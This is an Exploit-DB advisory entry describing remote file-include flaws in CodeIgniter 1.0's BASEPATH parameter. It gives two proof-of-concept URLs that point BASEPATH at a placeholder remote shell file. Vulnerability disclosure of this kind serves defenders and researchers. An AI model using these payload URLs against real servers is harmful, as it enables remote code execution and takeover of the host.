CodeIgniter 1.0 - 'BASEPATH' Multiple Remote File Include Vulnerabilities

2010-03-11T00:00:00
ID EDB-ID:33751
Type exploitdb
Reporter eidelweiss
Modified 2010-03-11T00:00:00

Description

CodeIgniter 1.0 'BASEPATH' Multiple Remote File Include Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/38672/info

CodeIgniter is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.

CodeIgniter 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
http://www.example.com/system/database/DB_driver.php?BASEPATH=[Shell.txt?]